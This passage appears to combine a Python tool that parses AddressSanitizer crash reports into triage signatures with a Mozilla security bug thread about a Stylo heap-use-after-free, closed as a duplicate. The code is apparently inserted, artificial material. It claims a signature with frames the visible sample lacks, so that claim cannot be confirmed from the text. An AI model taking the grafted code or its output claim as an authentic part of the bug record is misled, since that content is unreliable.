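    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7fafd21097ae in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7fafd21097ae in mozilla::ServoCSSRuleList::GetRule(unsigned int) /builds/worker/workspace/build/src/layout/style/ServoCSSRuleList.cpp:105
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:369:15 in HasWrapperFlag
"""

# Assumed shapes of the ASAN text format (not taken from the page).
HEADER_RE = re.compile(r"^==(\d+)==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+) at pc (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+) thread (\S+)")
REGION_RE = re.compile(r"is located (\d+) bytes (.+?) (\d+)-byte region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)")
# Function names may contain spaces (template args, signatures); the
# source location is always the last whitespace-free token on the line.
FRAME_RE = re.compile(r"^\s*#(\d+)\s+0x[0-9a-fA-F]+\s+in\s+(.+?)\s+(\S+)$")


def is_allocator_frame(function: str) -> bool:
    """Allocator plumbing at the top of alloc/free stacks carries no triage signal."""
    return (function.startswith(("__interceptor_", "operator new", "operator delete"))
            or function in {"malloc", "calloc", "realloc", "free", "moz_xmalloc"})


@dataclass
class Frame:
    index: int
    function: str
    location: str


@dataclass
class AsanReport:
    pid: int
    bug_type: str
    address: int
    pc: int
    access: Optional[str] = None
    access_size: Optional[int] = None
    thread: Optional[str] = None
    region_offset: Optional[int] = None
    region_relation: Optional[str] = None
    region_size: Optional[int] = None
    region_start: Optional[int] = None
    region_end: Optional[int] = None
    stacks: Dict[str, List[Frame]] = field(
        default_factory=lambda: {"access": [], "freed": [], "allocated": []})

    def region_consistent(self) -> bool:
        """For 'inside of' reports the address must equal start + offset and the
        bounds must agree with the stated size; a mismatch means a garbled report."""
        if self.region_start is None or self.region_relation != "inside of":
            return False
        return (self.region_start + self.region_offset == self.address
                and self.region_end - self.region_start == self.region_size)


def first_interesting_frame(frames: List[Frame]) -> Optional[Frame]:
    """First frame that is not allocator plumbing (falls back to frame #0)."""
    for f in frames:
        if not is_allocator_frame(f.function):
            return f
    return frames[0] if frames else None


def parse_asan_report(text: str) -> AsanReport:
    report: Optional[AsanReport] = None
    section = "access"  # frames before 'freed by'/'previously allocated' belong to the access
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            report = AsanReport(int(m.group(1)), m.group(2), int(m.group(3), 16), int(m.group(4), 16))
            continue
        if report is None:
            continue  # skip anything before the ERROR banner
        m = ACCESS_RE.match(line)
        if m:
            report.access, report.access_size, report.thread = m.group(1), int(m.group(2)), m.group(4)
            continue
        m = REGION_RE.search(line)
        if m:
            report.region_offset, report.region_relation = int(m.group(1)), m.group(2)
            report.region_size = int(m.group(3))
            report.region_start, report.region_end = int(m.group(4), 16), int(m.group(5), 16)
            continue
        if line.startswith("freed by thread"):
            section = "freed"
            continue
        if line.startswith("previously allocated by thread"):
            section = "allocated"
            continue
        if line.startswith("SUMMARY:"):
            break
        m = FRAME_RE.match(line)
        if m:
            report.stacks[section].append(Frame(int(m.group(1)), m.group(2), m.group(3)))
    if report is None:
        raise ValueError("no AddressSanitizer ERROR banner found")
    return report


def crash_signature(report: AsanReport) -> str:
    """Dedup key: bug type, access kind, and the first meaningful function of each
    stack with parameter lists stripped so differing inlining does not split buckets."""
    parts = [report.bug_type, report.access or "?"]
    for name in ("access", "freed", "allocated"):
        f = first_interesting_frame(report.stacks[name])
        parts.append(f.function.split("(")[0] if f else "-")
    return "|".join(parts)


if __name__ == "__main__":
    r = parse_asan_report(SAMPLE_REPORT)
    print(crash_signature(r), "region consistent:", r.region_consistent())
```

The signature for this report comes out as `heap-use-after-free|READ|HasWrapperFlag|SnowWhiteKiller::~SnowWhiteKiller|mozilla::ServoCSSRuleList::GetRule`, which is what lets a pipeline recognise that this testcase and the one in bug 1412145 land in the same bucket before anyone reads the stacks by hand.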
Updated•7 years ago
Keywords: csectype-uaf, sec-high
Comment 2•7 years ago
Only reproduces with Stylo enabled. Bisection goes all the way back to when we started building it by default.
Group: core-security → layout-core-security
Severity: normal → critical
Has Regression Range: --- → no
status-firefox56: --- → disabled
status-firefox57: --- → affected
status-firefox-esr52: --- → unaffected
tracking-firefox57: --- → ?
tracking-firefox58: --- → ?
Priority: -- → P2
Summary: heap-use-after-free in mozilla::dom::CSSRuleBinding::get_parentRule → stylo: heap-use-after-free in mozilla::dom::CSSRuleBinding::get_parentRule
Updated•7 years ago
Flags: needinfo?(emilio)
Updated•7 years ago
Flags: needinfo?(xidorn+moz)
Comment 4•7 years ago
Yeah, I know this was familiar... But it was late yesterday. Xidorn can maybe confirm :)
Flags: needinfo?(emilio)
Comment 5•7 years ago
Too late for 57.
Comment 7•7 years ago
So, I had a look at the testcase, and it seems that this is indeed something that bug 1412145 should fix. This exploits it via the keyframes rule's CSS rule list. The patch in that bug includes a fix to the related code.
Flags: needinfo?(xidorn+moz)
Comment 8•7 years ago
Needinfo'ing myself to test whether there's a way to reproduce in Nightly.
Flags: needinfo?(fbraun)
Updated•7 years ago
Flags: needinfo?(fbraun)
Comment 9•7 years ago
Doesn't reproduce indeed. Thanks to truber for helping with verification. Dan, can we close this one?
Flags: needinfo?(dveditz)
Updated•7 years ago
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(dveditz)
Resolution: --- → DUPLICATE
Comment 11•7 years ago
Updating 58 status from 1412145.
Updated•6 years ago
Whiteboard: [adv-main58-]
Updated•6 years ago
Flags: sec-bounty?
Updated•6 years ago
Flags: sec-bounty? → sec-bounty-
Updated•6 years ago
Group: layout-core-security